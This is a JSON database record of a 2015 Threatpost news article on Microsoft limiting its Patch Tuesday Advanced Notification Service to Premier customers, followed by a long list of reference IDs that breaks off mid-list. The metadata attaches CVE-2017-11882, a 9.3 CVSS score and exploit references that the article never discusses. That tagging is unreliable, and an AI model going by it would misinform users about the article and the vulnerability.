{"id": "THREATPOST:3283173A16F1E86892491D89F2E307C2", "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft Shuts Down Patch Tuesday Advanced Notifications", "description": "Microsoft today pulled the plug on its Advanced Notification Service (ANS), offering it going forward only to paying Premier customers.\n\nANS preceded the release of Microsoft\u2019s monthly Patch Tuesday security bulletins; on the Thursday prior, Microsoft would provide users via its security website a high-level preview of how many bulletins could be expected on the ensuing Tuesday, and more importantly, the severity of the vulnerabilities scheduled to be patched. The advanced notification helped companies allocate resources in advance to patch prioritization and testing.\n\nMicrosoft, however, said today that the decade-old [ANS has outlived its usefulness](<http://blogs.technet.com/b/msrc/archive/2015/01/08/evolving-advance-notification-service-ans-in-2015.aspx>).\n\n\u201cANS has always been optimized for large organizations. However, customer feedback indicates that many of our large customers no longer use ANS in the same way they did in the past due to optimized testing and deployment methodologies,\u201d said Chris Betz of the Microsoft Security Resource Center. \u201cWhile some customers still rely on ANS, the vast majority waits for Update Tuesday, or take no action, allowing updates to occur automatically.\u201d\n\nBetz said Microsoft customers instead rely on Microsoft Update and Windows Server Update Service to assist with patch prioritization.\n\n\u201cCustomers are also moving to cloud-based systems which provide continuous updating,\u201d Betz said.\n\nThat rationalization isn\u2019t sitting well with some experts, who said the move is against the grain established by the Trustworthy Computing initiative, which not only revamped how Microsoft builds security in to its development lifecycle, but also gave birth to Patch Tuesday.\n\n\u201cThis is an assault on IT and IT security teams everywhere. Making this change without any lead up time is simply oblivious to the impact this will have in the real world,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cMicrosoft is basically going back to a message of \u2018just blindly trust\u2019 that we will patch everything for you. Honestly, it\u2019s shocking.\u201d\n\nMicrosoft said it will provide ANS to its Premier customers through their Technical Account Manager support representatives; participants in Microsoft\u2019s MAPP partner program will also receive ANS notifications. In May, Microsoft made available its new [myBulletins service](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>), which allows Windows admins to customize security patch information, filtering it by products in use inside an enterprise or midmarket company. Notifications and advisories were left out of myBulletins, to the chagrin of some.\n\n> Microsoft Advanced Notification Service available only to Premier support customers.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-limits-advanced-patch-notifications-to-premier-customers%2F110294%2F&text=Microsoft+Advanced+Notification+Service+available+only+to+Premier+support+customers.>)\n\n\u201cWith the advent of the famous TWC memo and years of work by MSRC to gain a solid working relationship within the security community, to suddenly switch a free and relied upon service to a fee based system will only backfire,\u201d said Andrew Storms, vice president of security services at New Context, a systems architecture firm in San Francisco. \u201cI can only imagine that since the forced retirement of so many MSRC folks in 2014, that Microsoft might be trying to make ends meet.\u201d\n\nMicrosoft in September announced it was [disbanding its Trustworthy Computing unit](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>), the cornerstone of the Secure Development Lifecycle born out of [Bill Gates\u2019 2002 memo](<http://www.computerbytesman.com/security/billsmemo.htm>). The decision coincided with the layoff of 2,100 employees and reshuffling of many TWC security people into the company\u2019s cloud and enterprise division, as well as Microsoft\u2019s legal group.\n\nMicrosoft was not clear on whether all of its advanced notifications will go away, including those for out-of-band patches.\n\n\u201cIf that\u2019s the case, then it will surely feel like Microsoft has stepped back in time by a decade or more,\u201d Storms said.\n", "published": "2015-01-08T14:50:57", "modified": "2015-01-12T20:44:11", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/", "reporter": "Michael Mimoso", "references": ["http://blogs.technet.com/b/msrc/archive/2015/01/08/evolving-advance-notification-service-ans-in-2015.aspx", "http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339", "https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-limits-advanced-patch-notifications-to-premier-customers%2F110294%2F&text=Microsoft+Advanced+Notification+Service+available+only+to+Premier+support+customers.", "http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404", "http://www.computerbytesman.com/security/billsmemo.htm"], "cvelist": ["CVE-2017-11882"], "lastseen": "2018-10-06T22:57:36", "viewCount": 3, "enchantments": {"score": {"value": 6.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-11884"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "hivepro", "idList": ["HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F"]}, {"type": "kaspersky", "idList": ["KLA11139"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011276", "KB4011604", "KB4011618"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_NOV_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-101757"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:DADA9CB340C28F942D085928B22B103F", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", 